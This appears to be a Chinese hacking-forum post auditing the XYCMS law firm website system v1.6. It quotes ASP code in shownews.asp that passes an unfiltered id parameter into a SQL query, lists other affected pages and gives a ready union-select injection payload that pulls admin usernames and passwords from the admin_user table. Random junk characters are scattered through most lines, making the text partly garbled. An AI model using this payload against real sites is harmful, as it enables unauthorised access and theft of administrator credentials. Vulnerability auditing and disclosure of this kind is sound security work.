前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
0 ^5 U c/ G3 b n: I# T % ^. Q# w1 }: w. _- H' T
淫荡分割线9 c$ Q0 D1 ]9 w1 Q2 W# T( S1 R
--------------------------------------------------------9 ~ K* ]$ E! @
% u5 b# ~ _5 t. j% ^3 y4 ^审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
+ M' X( Q$ \0 a! U# T( g; S源码地址:http://down.chinaz.com/soft/29233.htm2 S3 m2 T9 {- N3 c
' U( I; G4 d: m1 A X4 r, Y+ m
漏洞文件:shownews.asp
" [( i2 h! ^- l1 [漏洞代码:7-13行& \) s) z/ F( Y" a9 ~
- e! T. @' M3 K $ J- C9 I9 a% p$ C( |; \
<%
# ?+ j! a+ _$ q C9 z1 s* Eid=request.QueryString("id")
7 e0 i- h* m% D+ Q9 v3 T0 ^
! T* d9 {2 A9 cset snews=server.createobject("adodb.recordset")
7 u: M4 R, I; w) r8 Xexec="select * from [news] where id="&id
* f$ _, P$ J, }" K% usnews.open exec,conn,1,1
7 ^; Y0 y. k/ m/ M! N. `%>4 m; U0 \/ ?. t. M5 J4 D P
! ^* k$ {! W4 X6 ?& Z% s+ T
3 h5 h F9 Z/ W. K- w
什么过滤都没有 直造成注入
- X9 P. C: w! |) l4 r2 p/ ?1 {$ A
( B: d2 v( Y# F注入点:http://127.0.0.1:99/shownews.asp?id=xx' ^7 n' x7 f3 i: A; N$ n
g# \; ?' j9 J9 q. T
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找: A7 B1 E. M) H2 ]! d% S1 W* }8 N
p8 @; X% Z5 i( {" y
" i* d. z/ r- W+ J2 T
exp: union select 1,admin,password,4,5,7 from admin_user
! T M7 ~& m0 Y# r/ Z$ C. x8 R% x% O* b. _
|